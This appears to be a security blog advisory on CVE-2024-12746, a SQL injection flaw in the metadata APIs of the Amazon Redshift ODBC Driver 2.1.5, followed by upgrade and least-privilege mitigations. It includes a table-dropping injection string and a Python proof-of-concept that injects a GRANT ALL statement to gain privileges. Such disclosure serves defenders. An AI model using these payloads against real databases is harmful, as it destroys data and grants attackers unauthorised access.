CVE-2024-12746 - SQL Injection Attack in Amazon Redshift ODBC Driver v2.1.5.

In February 2024, a critical SQL injection vulnerability (CVE-2024-12746) was discovered in the Amazon Redshift ODBC Driver, specifically version 2.1.5. for both Windows and Linux. This flaw lets an attacker gain escalated privileges by abusing the SQLTables or SQLColumns Metadata APIs. Fortunately, Amazon has since addressed the issue in version 2.1.6., and recommends downgrading to 2.1.4. if you cannot upgrade immediately.

In this exclusive deep-dive, we'll explain how the vulnerability works, show sample exploitation steps, and help you secure your Redshift environments.

Product: Amazon Redshift ODBC Driver

- Vulnerable Version: 2.1.5. (Windows/Linux)

References

- Amazon Security Bulletin
- NIST NVD Entry

How Does the Exploit Work?

ODBC (Open Database Connectivity) drivers let applications interact with databases using SQL. Developers often use metadata functions like SQLTables or SQLColumns to get information about tables or columns.

Vulnerability:
In Amazon Redshift ODBC Driver 2.1.5., user-supplied input to these metadata APIs is not properly sanitized. An attacker can inject malicious SQL code in the function's table name or schema name arguments.

Example Exploitation Scenario

Let's imagine a reporting app where users can enter a table name to look up in Redshift. The back-end code might call SQLTables like this (Python-style pseudocode):

import pyodbc

# Dangerous: takes user input directly
table = input("Enter table name: ")
conn = pyodbc.connect("DSN=Redshift")
cursor = conn.cursor()
# Calls SQLTables with untrusted user input
cursor.tables(table=table)

Malicious Input:

Suppose a malicious user enters this as the table name

dummy'; DROP TABLE users; --

What Happens?

With version 2.1.5. of the ODBC driver, the underlying SQL sent to Redshift would end up like

SELECT ... FROM pg_tables WHERE tablename = 'dummy'; DROP TABLE users; --'

The injected command DROP TABLE users; executes, deleting the table and damaging your data.

Proof-of-Concept Exploit (Python)

The proof-of-concept below shows how an attacker might exploit the vulnerability.

import pyodbc

malicious_input = "public'; GRANT ALL ON SCHEMA public TO attacker_user; --"
conn = pyodbc.connect("DSN=RedshiftVulnerable215")
cursor = conn.cursor()

try:
    # This triggers the vulnerable driver logic
    cursor.columns(schema=malicious_input)
    print("Exploit sent successfully.")
except Exception as e:
    print("Error during exploitation:", e)

What this does:
- The injected GRANT ALL ON SCHEMA public TO attacker_user; will run and grant full schema privileges to the attacker's account.

How to Check Your Driver Version

To check your ODBC driver version on Windows, open ODBC Data Source Administrator and look for "Amazon Redshift ODBC Driver":

2.1.4. (safe, can downgrade if unable to upgrade)

- 2.1.6. (safe, upgraded/fixed)

On Linux, run

odbcinst -j
odbcinst -q -d -n "Amazon Redshift"

Upgrade

Download the latest (2.1.6.) Redshift ODBC driver from the official Amazon page.

Principle of Least Privilege

Restrict Redshift account privileges so even in the event of SQL injection, attackers can do minimal harm.

Monitor

Audit logs for unusual statements like GRANT, DROP, or CREATE from regular application service accounts.

Links to Original References

- Amazon Security Bulletin for CVE-2024-12746
- NIST CVE Record
- AWS Redshift ODBC Driver Official Docs

Conclusion

CVE-2024-12746 is a real threat for any business running Amazon Redshift with the ODBC driver v2.1.5.. The ease of exploitation — especially via common metadata API calls — makes it imperative to upgrade or downgrade your driver immediately. Always vet user input, apply the principle of least privilege, and keep your software up to date.

Stay safe, and patch now.

*Originally published by SecureTech Team, 2024 – For exclusive infosec insights, follow us on Twitter/X*

Timeline

Published on: 12/24/2024 17:15:08 UTC
Last modified on: 12/26/2024 15:15:06 UTC